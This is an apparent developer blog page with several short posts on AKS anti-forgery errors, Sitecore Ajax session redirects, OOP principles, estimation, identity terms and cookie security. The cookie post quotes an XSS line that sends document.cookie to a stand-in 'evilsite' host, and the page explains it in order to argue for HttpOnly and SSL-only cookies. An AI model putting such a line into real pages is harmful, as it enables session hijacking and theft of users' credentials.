Sunday, December 3, 2023

Monday, September 4, 2023

AKS The required anti-forgery form field __RequestVerificationToken is not present.

 Problem Statement:

If you migrate from Azure Web app service to Azure kubernetes services you may encounter issues related to Anti-forgery form field or token not exist for your mvc application or sitecore application.

System.Web.Mvc.HttpAntiForgeryException (0x80004005): The required anti-forgery form field "__RequestVerificationToken" is not present.
at System.Web.Helpers.AntiXsrf.TokenValidator.ValidateTokens(HttpContextBase httpContext, IIdentity identity, AntiForgeryToken sessionToken, AntiForgeryToken fieldToken)
at System.Web.Helpers.AntiXsrf.AntiForgeryWorker.Validate(HttpContextBase httpContext, String cookieToken, String formToken)


nginx is the root cause we need to enable underscore in config of nginx
It just needed underscores in header enable in the config:


Enables underscores in header names. default: is disabled

Wednesday, June 7, 2023

Resolve Http Status Code 200 for XHR Ajax request with HttpResponseMessage 401 Unauthorised

 Problem Statement:

Sitecore application .net framework 4.8, there is an event on the page called by angularjs or any client side scripting to call Sitecore API controller action. Session timeout with absolute cookie expiry using Azure AD B2C Owin OpenID connect in place. After a session timeout , for any ajax call to sitecore API become non responsive , no action method called. It resulted in 200 HttpStatus code but fail to redirect to login page for customer to login again.

Request URL:http://localhost:31757/api/accountapi/login Request Method:POST Status Code:200 OK and X-Responded-JSON:{"status":401,"headers":{"location":"http:\/\/localhost:31757\/Account\/Login?ReturnUrl=%2Fapi%2Faccountapi%2Flogin"}}


protected override void OnAuthorization(System.Web.Mvc.AuthorizationContext filterContext)
            if (User.Identity.IsAuthenticated == false)
                if (filterContext.HttpContext.Request.IsAjaxRequest())

                    IServiceResponse response = new ServiceResponse();
                    response.Status = ServiceResponseStatuses.Redirect;
                    var uiResponse = new UiServiceResponse(string.Empty)
                        Status = ServiceResponseStatuses.Redirect,
                        RedirectUrl = "/login"
                    filterContext.Result = new JsonResult
                        Data = uiResponse,
                        JsonRequestBehavior = JsonRequestBehavior.AllowGet

Thursday, April 27, 2023

Principles of Object Oriented Programming

4 principles of Oops 


Hide Implementation and let the implementing class take care of details. It is generalisation. Abstract base class.


Hide the data within the scope of class and allow access to properties through access modifiers. private fields /variables


Derived class inherits the base class. It is specialisation class. SportsCar : Car | MUV : Car
Is -A Relationship

Polymorphism : 

Overloading and Override Method.

Composition class- has a relationship Product --compose of price class, Ingredient Classs 

Journey towards Clean architecture

 During the early inception of technology, we started with Classic Three Layered Database centric Architecture.

Traditional Database centric 3 Layered Architecture

Onion Architecture

Sunday, March 26, 2023

Why Dev estimation is a Chink in sprint planning's Armour?

 Never assess the piece of work from the eye of strong technical developer. It is not right do so. Why? Let say your strong tech guy estimate for 2 days whereas your in general rule of thumb says otherwise then there is a major fault. On the contrary , team needs a buffer there is so many unforeseen contingencies that never cater to. Whether it is dev or testing or any other areas we must understand to factor many aspect such as resource time off, discovery, impact analysis , proof of concepts , dependencies and other caveats. Well the estimation is a key driver to set a right expectation and align budget costing model to its right dimension. We should set the delivery compass such a way it will steer us in a right direction. 

Wednesday, February 15, 2023

Useful terminology Jargon and technical terms


  • Customer facing application
  • Single Sign On Access (SSO)
  • OIDC provider
  • SAML provider( Security Assertion Markup Language)- System Entity issues SAML assertion
  • SAML - Auth0
  • Identity Provider( IDP)
  • Service Provider (SDP)
  • Social Identity Provider
  • Enterprise Credentials
  • Verification Code- One time passcode (OTP) or (OTC) One time code
  • Open ID connect (OIDC)
  • Standard Identity protocol (OIDC, Auth2.0)


Handle attacks:

  • Denial of service
  • Password spraying
  • Brute force attack

Wednesday, February 8, 2023

Google AI BARD bot mistake wipes $100bn off shares

AI will replace human but to just certain extend. If human can't be trusted how come AI that is build by Human itself.

Google unveiled its new bot called Bard

Google is searching for ways to reassure people that it is still out in front in the race for the best artificial intelligence technology.

And so far, the internet giant seems to be coming up with the wrong answer.

An advert designed to show off its new AI-bot, showed it answering a query incorrectly.

Shares in parent company Alphabet sank more than 7% on Wednesday, knocking $100bn (£82bn) off the firm's market value.

AI at the current state can never take over creativity and problem-solving skills. just like ChatGPT some of the results also incorrect.

[9:43 am] Thanh Nguyen

that's why we should only use it to become more productivity instead of making doing it the job for us 🐱‍🏍

Technical Design terminology

  •  Adaptor
  • Context
  • Handler
  • Interface
  • Abstract
  • Boilerplate- A code snippet that is repeated in application to quick start the application development. With no and minor code change. Like when we start html and body with general page . It is a like a frame. It is not a template where we create a object out of it.
  • Utility
  • Template
  • Resources
  • References
  • Constants
  • Validators
  • Connectors
  • Extensions
  • Providers
  • Builders
  • Processors
  • Factory
  • Helper
  • Service
  • Mock
  • Stub
  • Prototype
  • Entities
  • Domain
  • Model
  • View
  • Presentation
  • Business Layer
  • Infrastructure
  • Attributes
  • Property
  • Partial
  • Enum
  • Exception
  • Request
  • Response
  • Initializer
  • Constructor
  • Events
  • Handler
  • Rules
  • Component
  • Control
  • ToolKit
  • Wizard
  • App
  • Config
  • Filters
  • Library
  • Package
  • Widgets


Sunday, February 5, 2023

Why Cookie can turn into Monster?

I'm reading some verse from Bible and I know you all are on right path to god(Secure) not to Demon(Hacker). Please give thumps Up if you read this with your full faith and believe in HTTP Only Secure Cookie - Http +SSL


Chapter 1 Verse #1

Here’s an example: when you log on to an ASP.NET application using forms authentication, the default implementation will return you a cookie named “.ASPXAUTH”. It looks just like this:

Set-Cookie: .ASPXAUTH=737A8033B7A68EF4C1D3AC5C96353E9767EF677903AD7F796C1BF0D8DDE141EDC98451CF6A67837D29E12A722252BA93C7342D11341BAC2D49031923BA2DFD6ADCB04BDED56A685A7417353F81B04BECFEA4F3522CCBD86C0371A6EB75B6FF74

The contents of this cookie then travel back to the server on every request you make hence identifying you as the person who logged on earlier. The problem with this is that if an attacker can gain access to that cookie, they can steal your session or in other words, set the cookie in their own browser, go to the website and now the website thinks they’re you.

Chapter 2 Verse #2

Here’s an example: let’s imagine you have a website that has a cross site scripting vulnerability (remember, this is still number 2 on the Top 10 web application security risks and is extremely prevalent) and that an attacker can add arbitrary JavaScript to your page so they do this:

location.href = 'http://evilsite/?cookies=' + document.cookie;

What will happen is that the browser will happily redirect the unsuspecting user to the evil site and send all their cookies with the request. Those cookies may hold sensitive information – including authentication information – which the site may then harvest and use to hijack sessions. It really is that easy and whilst that example is rather rudimentary, much more elegant solutions exist which enable those cookies to be siphoned off without the user ever observing any odd behaviour on the website.

God has its own way -- Secure http only Http + SSL

What we need is a way to stop the browser from being able to access cookies on the client side and this is where the HTTP only flag comes in.

httpCookies httpOnlyCookies="true" requireSSL="true"

Friday, January 20, 2023

Azure Kubernetes Services Fundamentals


Kubernetes is an open source where one can automate deployment, scale the application system and manage containers.